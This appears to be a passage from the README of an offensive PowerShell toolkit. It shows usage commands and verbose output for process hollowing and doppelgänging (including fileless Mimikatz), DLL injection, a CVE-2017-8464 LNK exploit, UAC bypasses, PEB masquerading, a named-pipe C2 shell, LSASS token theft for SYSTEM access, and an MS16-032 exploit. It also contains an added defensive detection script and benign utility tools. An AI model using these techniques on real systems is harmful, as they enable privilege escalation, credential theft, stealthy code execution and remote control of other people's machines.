VERBOSE: [+] Duplicated .text section to the Sponsor
VERBOSE: [+] Duplicated .rdata section to the Sponsor
VERBOSE: [+] Duplicated .data section to the Sponsor
VERBOSE: [+] Duplicated .pdata section to the Sponsor
VERBOSE: [+] Duplicated .rsrc section to the Sponsor
VERBOSE: [+] Duplicated .reloc section to the Sponsor
VERBOSE: [+] New process ImageBaseAddress => 40000000
VERBOSE: [+] Created Hollow process parameters
VERBOSE: [+] Allocated memory in the Hollow
VERBOSE: [+] Process parameters duplicated into the Hollow
VERBOSE: [+] Rewrote Hollow->PEB->pProcessParameters
VERBOSE: [+] Created Hollow main thread..
True
```

### Start-Eidolon

This is a proof-of-concept for process doppelgänging, presented by enSilo at BlackHat EU. In short, the process involves creating an NTFS transaction from a file on disk (any file will do). Next, we overwrite that file in memory, create a section from the modified file and start a process based on that section. Afterwards we roll back the transaction: the original file is left untouched, but we end up with a process that appears to be backed by the original file. For a more complete description see the references in the script.

```
# Create a doppelgänger from a file on disk with explorer as the parent.
# x64 Win10 RS3
C:\PS> Start-Eidolon -Target C:\Some\File.Path -Eidolon C:\Some\Other\File.Path -ParentPID 12784 -Verbose
VERBOSE: [+] Created transaction object
VERBOSE: [+] Created transacted file
VERBOSE: [+] Overwriting transacted file
VERBOSE: [+] Created section from transacted file
VERBOSE: [+] Rolled back transaction changes
VERBOSE: [+] Opened handle to the parent => explorer
VERBOSE: [+] Created process from section
VERBOSE: [+] Acquired Eidolon PBI
VERBOSE: [+] Eidolon architecture is 64-bit
VERBOSE: [+] Eidolon image base: 0x7FF6A0570000
VERBOSE: [+] Eidolon entry point: 0x7FF6A05E40C8
VERBOSE: [+] Created Eidolon process parameters
VERBOSE: [+] Allocated memory in Eidolon
VERBOSE: [+] Process parameters duplicated into Eidolon
VERBOSE: [+] Rewrote Eidolon->PEB->pProcessParameters
VERBOSE: [+] Created Eidolon main thread..
True

# Create a fileless Mimikatz doppelgänger with PowerShell as the parent.
# x32 Win7
C:\PS> Start-Eidolon -Target C:\Some\File.Path -Mimikatz -Verbose
VERBOSE: [+] Created transaction object
VERBOSE: [+] Created transacted file
VERBOSE: [+] Overwriting transacted file
VERBOSE: [+] Created section from transacted file
VERBOSE: [+] Rolled back transaction changes
VERBOSE: [+] Created process from section
VERBOSE: [+] Acquired Eidolon PBI
VERBOSE: [+] Eidolon architecture is 32-bit
VERBOSE: [+] Eidolon image base: 0x400000
VERBOSE: [+] Eidolon entry point: 0x4572D2
VERBOSE: [+] Created Eidolon process parameters
VERBOSE: [+] Allocated memory in Eidolon
VERBOSE: [+] Process parameters duplicated into Eidolon
VERBOSE: [+] Rewrote Eidolon->PEB->pProcessParameters
VERBOSE: [+] Created Eidolon main thread..
True
```

### Stage-RemoteDll

Stage-RemoteDll is a small function to demonstrate various DLL injection techniques (NtCreateThreadEx / QueueUserAPC / SetThreadContext / SetWindowsHookEx) on 32-bit and 64-bit architectures. While I did some input validation and sanitisation, this is mostly proof-of-concept code. Also note that these techniques can easily be repurposed to execute shellcode directly in a remote process.

```
# Boolean return value
C:\PS> $CallResult = Stage-RemoteDll -ProcID 1337 -DllPath .\Desktop\evil.dll -Mode NtCreateThreadEx
C:\PS> $CallResult
True

# Verbose output
C:\PS> Stage-RemoteDll -ProcID 1337 -DllPath .\Desktop\evil.dll -Mode QueueUserAPC -Verbose
VERBOSE: [+] Using QueueUserAPC
VERBOSE: [>] Opening notepad
VERBOSE: [>] Allocating DLL path memory
VERBOSE: [>] Writing DLL string
VERBOSE: [>] Locating LoadLibraryA
VERBOSE: [>] Getting process threads
VERBOSE: [>] Registering APC's with all threads
VERBOSE: --> Success, registered APC
VERBOSE: --> Success, registered APC
VERBOSE: --> Success, registered APC
VERBOSE: --> Success, registered APC
VERBOSE: [>] Cleaning up..
True
```

### Export-LNKPwn

Create LNK files to exploit CVE-2017-8464 (aka LNK round three ;))! Currently it is recommended that you create the lnk file locally and then move it to the target system, because of .NET and PowerShell dependencies. See the function synopsis for more details.

```
C:\PS> Export-LNKPwn -LNKOutPath C:\Some\Local\Path.lnk -TargetCPLPath C:\Target\CPL\Path.cpl -Type SpecialFolderDataBlock
```

### UAC-TokenMagic

Based on James Forshaw's three-part series on UAC, and possibly a technique used by the CIA! Essentially, we duplicate the token of an elevated process, lower its mandatory integrity level, use it to create a new restricted token, impersonate it and use the Secondary Logon service to spawn a new process with High IL. Like playing hide-and-seek with tokens! ;)) This technique even bypasses the "Always Notify" setting, as long as you supply the PID of an elevated process.

Targets: 7,8,8.1,10,10RS1,10RS2

```
C:\PS> UAC-TokenMagic -BinPath C:\Windows\System32\cmd.exe -Args "/c calc.exe" -ProcPID 1116

[*] Session is not elevated
[*] Successfully acquired regedit handle
[*] Opened process token
[*] Duplicated process token
[*] Initialized MedIL SID
[*] Lowered token mandatory IL
[*] Created restricted token
[*] Duplicated restricted token
[*] Successfully impersonated security context
[*] Magic..
```

### Bypass-UAC

Bypass-UAC provides a framework to perform UAC bypasses based on auto-elevating IFileOperation COM object method calls. This is not a new technique; traditionally it is accomplished by injecting a DLL into "explorer.exe". That is undesirable because injecting into explorer may trigger security alerts, and working with unmanaged DLLs makes for an inflexible workflow.

To get around this, Bypass-UAC implements a function which rewrites PowerShell's PEB to give it the appearance of "explorer.exe". This provides the same effect, because the COM object relies exclusively on the Windows Process Status API (PSAPI), which reads the process PEB.

```
C:\PS> Bypass-UAC -Method ucmDismMethod

[!] Impersonating explorer.exe!
[+] PebBaseAddress: 0x000007F73E93F000
[!] RtlEnterCriticalSection --> &Peb->FastPebLock
[>] Overwriting &Peb->ProcessParameters.ImagePathName: 0x000000569B5F1780
[>] Overwriting &Peb->ProcessParameters.CommandLine: 0x000000569B5F1790
[?] Traversing &Peb->Ldr->InLoadOrderModuleList doubly linked list
[>] Overwriting _LDR_DATA_TABLE_ENTRY.FullDllName: 0x000000569B5F2208
[>] Overwriting _LDR_DATA_TABLE_ENTRY.BaseDllName: 0x000000569B5F2218
[!] RtlLeaveCriticalSection --> &Peb->FastPebLock
[>] Dropping proxy dll..
[+] 64-bit Yamabiko: C:\Users\b33f\AppData\Local\Temp\yam1730961377.tmp
[>] Creating XML trigger: C:\Users\b33f\AppData\Local\Temp\pac500602004.xml
[>] Performing elevated IFileOperation::MoveItem operation..
[?] Executing PkgMgr..
[!] UAC artifact: C:\Windows\System32\dismcore.dll
[!] UAC artifact: C:\Users\b33f\AppData\Local\Temp\pac500602004.xml
```

### Masquerade-PEB

Masquerade-PEB uses NtQueryInformationProcess to get a handle to PowerShell's PEB. From there it replaces a number of UNICODE_STRING structs in memory to make PowerShell look like a different process. Specifically, the function overwrites "ImagePathName" and "CommandLine" in _RTL_USER_PROCESS_PARAMETERS, and "FullDllName" and "BaseDllName" in the _LDR_DATA_TABLE_ENTRY linked list.

This can be useful because it fools any Windows workflow that relies entirely on the Process Status API to check a process's identity. The change is confined to the process's own user-mode PEB: the kernel's EPROCESS image name, which is what QueryFullProcessImageName, NtQueryInformationProcess(ProcessImageFileName) and kernel callbacks see, is untouched, so any check that does not go through PSAPI still sees powershell.exe.

```
C:\PS> Masquerade-PEB -BinPath C:\Windows\System32\notepad.exe

[?] PID 2756
[+] PebBaseAddress: 0x7FFD3000
[!] RtlEnterCriticalSection --> &Peb->FastPebLock
[>] Overwriting &Peb->ProcessParameters.ImagePathName: 0x002F11F8
[>] Overwriting &Peb->ProcessParameters.CommandLine: 0x002F1200
[?] Traversing &Peb->Ldr->InLoadOrderModuleList doubly linked list
[>] Overwriting _LDR_DATA_TABLE_ENTRY.FullDllName: 0x002F1B74
[>] Overwriting _LDR_DATA_TABLE_ENTRY.BaseDllName: 0x002F1B7C
[!] RtlLeaveCriticalSection --> &Peb->FastPebLock
```
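Both Bypass-UAC and Masquerade-PEB rely on the consumer asking PSAPI, which reads the target's PEB, for the image path. As an added example (my own detection check, not part of PowerShell-Suite), this compares the PSAPI answer (GetModuleFileNameEx, which walks the remote PEB->Ldr list through ReadProcessMemory) with the kernel's answer (QueryFullProcessImageName, which NtQueryInformationProcess serves from the EPROCESS image section and which PEB edits cannot reach). A mismatch flags a masqueraded process. The namespace PebCheck and the function name Test-PebMasquerade are my names.

```powershell
# Added example (not part of PowerShell-Suite): spot a masqueraded PEB by comparing
# the PSAPI view of a process's image path with the kernel's view.
$Source = @"
using System;
using System.Text;
using System.Runtime.InteropServices;
namespace PebCheck {
    public static class Native {
        [DllImport("kernel32.dll", SetLastError = true)]
        public static extern IntPtr OpenProcess(uint dwDesiredAccess, bool bInheritHandle, int dwProcessId);
        [DllImport("kernel32.dll", SetLastError = true)]
        public static extern bool CloseHandle(IntPtr hObject);
        // Kernel-side answer: derived from the EPROCESS image section, not from the target's PEB
        [DllImport("kernel32.dll", SetLastError = true, CharSet = CharSet.Unicode)]
        public static extern bool QueryFullProcessImageNameW(IntPtr hProcess, uint dwFlags, StringBuilder lpExeName, ref uint lpdwSize);
        // PSAPI answer: reads the target's PEB->Ldr module list via ReadProcessMemory
        [DllImport("psapi.dll", SetLastError = true, CharSet = CharSet.Unicode)]
        public static extern uint GetModuleFileNameExW(IntPtr hProcess, IntPtr hModule, StringBuilder lpFilename, uint nSize);
    }
}
"@
Add-Type -TypeDefinition $Source

function Test-PebMasquerade {
    param([Parameter(Mandatory = $true)][int]$ProcessId)
    $PROCESS_QUERY_INFORMATION = 0x0400
    $PROCESS_VM_READ           = 0x0010   # needed by PSAPI to read the remote PEB

    $h = [PebCheck.Native]::OpenProcess($PROCESS_QUERY_INFORMATION -bor $PROCESS_VM_READ, $false, $ProcessId)
    if ($h -eq [IntPtr]::Zero) {
        throw "OpenProcess($ProcessId) failed, Win32 error $([System.Runtime.InteropServices.Marshal]::GetLastWin32Error())"
    }
    try {
        $sb = New-Object System.Text.StringBuilder 1024
        [uint32]$len = $sb.Capacity
        if (-not [PebCheck.Native]::QueryFullProcessImageNameW($h, 0, $sb, [ref]$len)) { throw "QueryFullProcessImageName failed" }
        $kernelView = $sb.ToString()

        # hModule = NULL asks for the main executable's path, taken from the remote LDR entry
        $sb2 = New-Object System.Text.StringBuilder 1024
        if ([PebCheck.Native]::GetModuleFileNameExW($h, [IntPtr]::Zero, $sb2, $sb2.Capacity) -eq 0) { throw "GetModuleFileNameEx failed" }
        $pebView = $sb2.ToString()

        [pscustomobject]@{
            PID         = $ProcessId
            KernelImage = $kernelView
            PebImage    = $pebView
            Masqueraded = ($kernelView -ne $pebView)   # -ne is case-insensitive in PowerShell, fine for NTFS paths
        }
    } finally {
        [void][PebCheck.Native]::CloseHandle($h)
    }
}

# Sweep everything we can open and keep only the mismatches. Protected processes refuse
# PROCESS_VM_READ and 32-bit PowerShell cannot read a 64-bit PEB; those throw and are skipped.
Get-Process | ForEach-Object {
    try { Test-PebMasquerade -ProcessId $_.Id } catch { }
} | Where-Object Masqueraded
```

Run Masquerade-PEB in one PowerShell session, then run the sweep from a second session of the same bitness: by the description above, the masqueraded session should report PebImage as notepad.exe while KernelImage still says powershell.exe. Any consumer that wants a trustworthy identity for a peer process should therefore use QueryFullProcessImageName (or the Authenticode signature of that path) rather than the PSAPI module list.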
### Invoke-SMBShell

A proof-of-concept shell that uses named pipes (System.IO.Pipes) as a C2 channel. The SMB traffic is AES-CBC encrypted (code from Empire); the key and pipe name are randomly generated by the server at start-up. Encryption only hides the command text: the pipe name itself is visible in Sysmon Event ID 17/18 (PipeCreated/PipeConnected) on both ends and in Security Event 5145 on the server when detailed file share auditing is enabled.

**Server:**

```
PS C:\> Invoke-SMBShell

+-------
| Host Name: 0AK
| Named Pipe: tapsrv.5604.yk0DxXvjUD9xwyJ9
| AES Key: q6EKfuJTX93YUnmX
+-------

[>] Waiting for client..

SMB shell: whoami
0ak\b33f

SMB shell: IdontExist
The term 'IdontExist' is not recognized as the name of a cmdlet, function, script file, or operable program. Check the spelling of the name, or if a path was included, verify that the path is correct and try again.

SMB shell: $PSVersionTable

Name                       Value
----                       -----
PSRemotingProtocolVersion  2.2
BuildVersion               6.2.9200.17065
PSCompatibleVersions       {1.0, 2.0, 3.0}
PSVersion                  3.0
CLRVersion                 4.0.30319.42000
WSManStackVersion          3.0
SerializationVersion       1.1.0.1

SMB shell: leave
[!] Client disconnecting..

[>] Waiting for client..

SMB shell: calc
Job SMBJob-dVkIkAkXINjMe09S completed successfully!

SMB shell: exit
[!] Client disconnecting..
[!] Terminating server..
PS C:\>
```

**Client:**

```
# Client disconnected because of "leave" command
PS C:\> Invoke-SMBShell -Client -Server 0AK -AESKey q6EKfuJTX93YUnmX -Pipe tapsrv.5604.yk0DxXvjUD9xwyJ9

# Client disconnected because "exit" command kills client/server
PS C:\> Invoke-SMBShell -Client -Server 0AK -AESKey q6EKfuJTX93YUnmX -Pipe tapsrv.5604.yk0DxXvjUD9xwyJ9
```

### Conjure-LSASS

Use the SeDebugPrivilege to duplicate the LSASS access token and impersonate it in the calling thread. If SeDebugPrivilege is disabled, the function will re-enable it. Note in the sample below that whoami fails while Get-ChildItem on the SAM hive succeeds: whoami is a new process, which does not inherit the calling thread's impersonation token, whereas in-process cmdlets run under the impersonated SYSTEM context.

```
Conjure LSASS into our midst! ;)
C:\PS> Conjure-LSASS

[?] SeDebugPrivilege is available!
[+] Current process handle: 852
[>] Calling Advapi32::OpenProcessToken
[+] Token handle with TOKEN_ADJUST_PRIVILEGES|TOKEN_QUERY: 2000
[?] SeDebugPrivilege is enabled!
[>] Calling Advapi32::OpenProcessToken --> LSASS
[+] Token handle with TOKEN_IMPERSONATE|TOKEN_DUPLICATE: 1512
[>] Calling Advapi32::DuplicateToken --> LSASS
[+] Duplicate token handle with SecurityImpersonation level: 2008
[>] Calling Advapi32::SetThreadToken
[+] Knock knock .. who's there .. LSASS
[+] User context: SYSTEM

C:\PS> whoami
ERROR: Access is denied.
ERROR: Access is denied.

C:\PS> Get-ChildItem -Path hklm:SAM

    Hive: HKEY_LOCAL_MACHINE\SAM

SKC  VC Name  Property
---  -- ----  --------
  3   2 SAM   {C, ServerDomainUpdates}
```

### Invoke-MS16-032

PowerShell implementation of MS16-032. The exploit targets all vulnerable operating systems that support PowerShell v2+. Credit for the discovery of the bug and the logic to exploit it go to James Forshaw (@tiraniddo).

Targets:

* Win7-Win10 & 2k8-2k12 <== 32/64 bit!
* Tested on x32 Win7, x64 Win8, x64 2k12R2 ==> Not tested on Vista with PowerShell v1; let me know the result if you are able to check!

```
Sit back and watch the pwn!
C:\PS> Invoke-MS16-032

[MS16-032 ASCII art banner]

                [by b33f -> @FuzzySec]

[?] Operating system core count: 2
[>] Duplicating CreateProcessWithLogonW handle
[?] Done, using thread handle: 956

[*] Sniffing out privileged impersonation token..

[?] Thread belongs to: svchost
[+] Thread suspended
[>] Wiping current impersonation token
[>] Building SYSTEM impersonation token
[?] Success, open SYSTEM token handle: 964
[+] Resuming thread..

[*] Sniffing out SYSTEM shell..

[>] Duplicating SYSTEM token
[>] Starting token race
[>] Starting process race
[!] Holy handle leak Batman, we have a SYSTEM shell!!
```

### Subvert-PE

Inject shellcode into a PE image while retaining the PE functionality.

For more details, see:

* FuzzySecurity: [PowerShell PE Injection: This is not the Calc you are looking for!](http://www.fuzzysecurity.com/tutorials/20.html)

```
Analyse the PE header and hexdump the region of memory where shellcode would be injected.
C:\PS> Subvert-PE -Path C:\Path\To\PE.exe

Same as above but continue to inject shellcode and overwrite the binary.
C:\PS> Subvert-PE -Path C:\Path\To\PE.exe -Write
```

## Tools

### Get-LimitChildItem

Depth-limited wrapper for Get-ChildItem with basic filter functionality. (PowerShell 5 added a native -Depth parameter to Get-ChildItem; this wrapper is for older versions.)

```
# UNC path txt file search
PS C:\> Get-LimitChildItem -Path "\\192.168.84.129\C$\Program Files\" -MaxDepth 5 -Filter "*.txt"
\\192.168.84.129\C$\Program Files\Windows Defender\ThirdPartyNotices.txt
\\192.168.84.129\C$\Program Files\VMware\VMware Tools\open_source_licenses.txt
\\192.168.84.129\C$\Program Files\VMware\VMware Tools\vmacthlp.txt
\\192.168.84.129\C$\Program Files\Windows NT\TableTextService\TableTextServiceAmharic.txt
\\192.168.84.129\C$\Program Files\Windows NT\TableTextService\TableTextServiceArray.txt
\\192.168.84.129\C$\Program Files\Windows NT\TableTextService\TableTextServiceDaYi.txt
\\192.168.84.129\C$\Program Files\Windows NT\TableTextService\TableTextServiceTigrinya.txt
\\192.168.84.129\C$\Program Files\Windows NT\TableTextService\TableTextServiceYi.txt

# Local wildcard *ini* search
PS C:\> Get-LimitChildItem -Path C:\ -MaxDepth 3 -Filter "*ini*"
C:\Windows\system.ini
C:\Windows\win.ini
C:\Windows\Boot\BootDebuggerFiles.ini
C:\Windows\Fonts\desktop.ini
C:\Windows\INF\mdmminij.inf
C:\Windows\Media\Windows Minimize.wav
C:\Windows\PolicyDefinitions\PenTraining.admx
C:\Windows\PolicyDefinitions\WinInit.admx
C:\Windows\System32\dwminit.dll
C:\Windows\System32\ie4uinit.exe
C:\Windows\System32\ieuinit.inf
C:\Windows\System32\PerfStringBackup.INI
C:\Windows\System32\rdpinit.exe
C:\Windows\System32\regini.exe
C:\Windows\System32\secinit.exe
C:\Windows\System32\tcpmon.ini
C:\Windows\System32\TpmInit.exe
C:\Windows\System32\userinit.exe
C:\Windows\System32\userinitext.dll
C:\Windows\System32\UXInit.dll
C:\Windows\System32\WimBootCompress.ini
C:\Windows\System32\wininet.dll
C:\Windows\System32\wininetlui.dll
C:\Windows\System32\wininit.exe
C:\Windows\System32\wininitext.dll
C:\Windows\System32\winipcfile.dll
C:\Windows\System32\winipcsecproc.dll
C:\Windows\System32\winipsec.dll
C:\Windows\SysWOW64\ieuinit.inf
C:\Windows\SysWOW64\regini.exe
C:\Windows\SysWOW64\secinit.exe
C:\Windows\SysWOW64\TpmInit.exe
C:\Windows\SysWOW64\userinit.exe
C:\Windows\SysWOW64\userinitext.dll
C:\Windows\SysWOW64\UXInit.dll
C:\Windows\SysWOW64\WimBootCompress.ini
C:\Windows\SysWOW64\wininet.dll
C:\Windows\SysWOW64\wininetlui.dll
C:\Windows\SysWOW64\wininitext.dll
C:\Windows\SysWOW64\winipcfile.dll
C:\Windows\SysWOW64\winipcsecproc.dll
C:\Windows\SysWOW64\winipsec.dll
```

### Get-CRC32

A simple wrapper for the undocumented RtlComputeCrc32 function.

```
# Example from string
C:\PS> $String = [System.Text.Encoding]::ASCII.GetBytes("Testing!")
C:\PS> Get-CRC32 -Buffer $String
2392247274
```

### Trace-Execution

Uses the Capstone engine to recursively disassemble a PE (x32/x64) from its entry point, effectively "tracing" the execution flow. The following rules apply:

- Jumps are taken if the jump address falls within the PE address space
- Calls are taken if the call address falls within the PE address space
- Returns are taken, using the return address stored by the call instruction
- Indirect calls/jumps are not taken
- Conditional jumps are not taken
- Calls/jumps that reference registers are not taken

There are a lot of edge cases here which can make the disassembly unreliable. Generally, the more addresses you disassemble, the less trustworthy the output. The call table can be used as a reference to evaluate the accuracy of the output.

Because the disassembly is static and works from a byte array, x32/x64 PE files can be disassembled regardless of the bitness of PowerShell.

```
PS C:\> Trace-Execution -Path .\Desktop\some.exe -InstructionCount 10

[>] 32-bit Image!

[?] Call table:

Address    Mnemonic Taken Reason
-------    -------- ----- ------
0x4AD0829A call     Yes   Relative offset call
0x4AD07CB7 call     No    Indirect call

[?] Instruction trace:

Size Address    Mnemonic Operands                        Bytes                   RegRead  RegWrite
---- -------    -------- --------                        -----                   -------  --------
   5 0x4AD0829A call     0x4ad07c89                      {232, 234, 249, 255...}          {esp}
   2 0x4AD07C89 mov      edi, edi                        {139, 255, 249, 255...}
   1 0x4AD07C8B push     ebp                             {85, 255, 249, 255...}  {esp}    {esp}
   2 0x4AD07C8C mov      ebp, esp                        {139, 236, 249, 255...}
   3 0x4AD07C8E sub      esp, 0x10                       {131, 236, 16, 255...}           {eflags}
   5 0x4AD07C91 mov      eax, dword ptr [0x4ad240ac]     {161, 172, 64, 210...}
   4 0x4AD07C96 and      dword ptr [ebp - 8], 0          {131, 101, 248, 0...}            {eflags}
   4 0x4AD07C9A and      dword ptr [ebp - 4], 0          {131, 101, 252, 0...}            {eflags}
   1 0x4AD07C9E push     ebx                             {83, 101, 252, 0...}    {esp}    {esp}
   1 0x4AD07C9F push     edi                             {87, 101, 252, 0...}    {esp}    {esp}
   5 0x4AD07CA0 mov      edi, 0xbb40e64e                 {191, 78, 230, 64...}
   5 0x4AD07CA5 mov      ebx, 0xffff0000                 {187, 0, 0, 255...}
   2 0x4AD07CAA cmp      eax, edi                        {59, 199, 0, 255...}             {eflags}
   6 0x4AD07CAC jne      0x4ad1bc8c                      {15, 133, 218, 63...}   {eflags}
   1 0x4AD07CB2 push     esi                             {86, 133, 218, 63...}   {esp}    {esp}
   3 0x4AD07CB3 lea      eax, dword ptr [ebp - 8]        {141, 69, 248, 63...}
   1 0x4AD07CB6 push     eax                             {80, 69, 248, 63...}    {esp}    {esp}
   6 0x4AD07CB7 call     dword ptr [0x4ad01150]          {255, 21, 80, 17...}             {esp}
   3 0x4AD07CBD mov      esi, dword ptr [ebp - 4]        {139, 117, 252, 0...}
   3 0x4AD07CC0 xor      esi, dword ptr [ebp - 8]        {51, 117, 248, 0...}             {eflags}
```

### Calculate-Hash

PowerShell v2 compatible script to calculate file hashes. I quickly wrote this because Get-FileHash is only available from v4 onward.

```
Get the SHA512 hash of "C:\Some\File.path".
C:\PS> Calculate-Hash -Path C:\Some\File.path -Algorithm SHA512
```

### Check-VTFile

Submits the SHA256 hash of a file to VirusTotal and retrieves the scan report if the hash is known. This requires you to get a (free) VirusTotal API key. Again, there are many better projects that do this, but they are not PowerShell v2 compatible.

```
C:\PS> Check-VTFile -Path C:\Some\File.path
```